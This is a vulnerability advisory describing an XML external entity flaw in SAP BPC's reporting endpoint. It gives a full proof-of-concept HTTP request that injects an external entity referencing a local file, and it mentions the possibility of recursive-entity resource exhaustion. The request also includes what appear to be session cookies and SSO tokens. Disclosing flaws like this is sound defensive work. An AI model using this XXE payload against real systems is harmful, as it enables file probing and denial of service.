An exploitable XML external entity vulnerability exists in the reporting functionality of SAP BPC. A specially crafted XML request can cause an XML external entity to be referenced, resulting in information disclosure and potential denial of service. An attacker can issue authenticated HTTP requests to trigger this vulnerability.
6.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L
CWE-611 - Improper Restriction of XML External Entity Reference
It was identified that the web application was vulnerable to an XML External Entity injection attack. While making malformed requests to most parts of the application appeared to produce error messages that indicated that XML validation was occurring, one location was identified where this was not the case:
POST /sap/bpc/systemrpt/GROUP_REPORTING1/AA HTTP/1.1 Accept: application/xml Accept-Language: en Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest SAP-ModuleName: PC Web Client SAP-TemplateName: Content-Type: application/xml; charset=UTF-8 Content-Length: 541 Cookie: sap-usercontext=sap-language=EN&sap-client=500; MYSAPSSO2=AjQxMDIBABgAQQBQAFAARQBOAFQARQBTAFQARQBSADMCAAYANQAwADADABAAQQBQAEMAIAAgACAAIAAgBAAYADIAMAAxADUAMAA1ADIANwAxADUANAA4BAAAQEAACAYAAgBYCQACAEX%2fAPwwgfkGCSqGSIb3DQEHAqCB6zCB6AIVqwWWarAkGBSsOAwIaBQAwCwYJKoZIhvcNAQcBMYHIMIHFAgEBMBkwDjEMMAoGA1UEAxMDQVBDAgcgFBIiFyE4MAkGBSsOAwIaBQCgXTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcFFhZGCSqGSIb3DQEJBTEPFw0xNTA1MjcxNTQ4MTdaMCMGCSqGSIb3DQEJBDEWBBRF0JDFCj0%2fafX%2fXaDDdqeXWf57xDAJBgcqhkjOOAQDBDAwLgIVALiRIey0Km0F40INQNQ%2fZOJaa3WoAhUAlHO3IGcRMTItvoVUKQLn2ngZR9U%3d; SAP_SESSIONID_APC_500=nNh7rq2Zn-CuMr1ABb_FzlVd-NyWhI8A4QCAAAoLIYc%3d Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <!DOCTYPE AuditActivityReportFilter [<!ELEMENT AuditActivityReportFilter ANY ><!ENTITY xxe SYSTEM "file:///bin/sh" >]> <AuditActivityReportFilter xmlns="http://xml.sap.com/2010/02/bpc"> <TimeScope> <StartTime/> <EndTime/> </TimeScope> <Paging> <PageSize>20</PageSize> <PageIndex>2</PageIndex> </Paging> <UserID/> <ActivityFor>AppSet</ActivityFor> <FunctionTask>&xxe;</FunctionTask> <Source/> <Parameter/> <Field/> <PreValue/> <NewValue/> <ReportFrom>ACTIVE</ReportFrom> </AuditActivityReportFilter>
In this instance, two different responses were seen, which appeared to vary depending on whether the XXE entity was defined as a valid (as in this case) or invalid local file. In the event that an invalid file was referenced, an error was instead returned.
The vulnerability could also be used to trigger a CPU or memory exhaustion attack through recursively defined XML entities.
Discovered by Tim Brown of Security Advisory EMEAR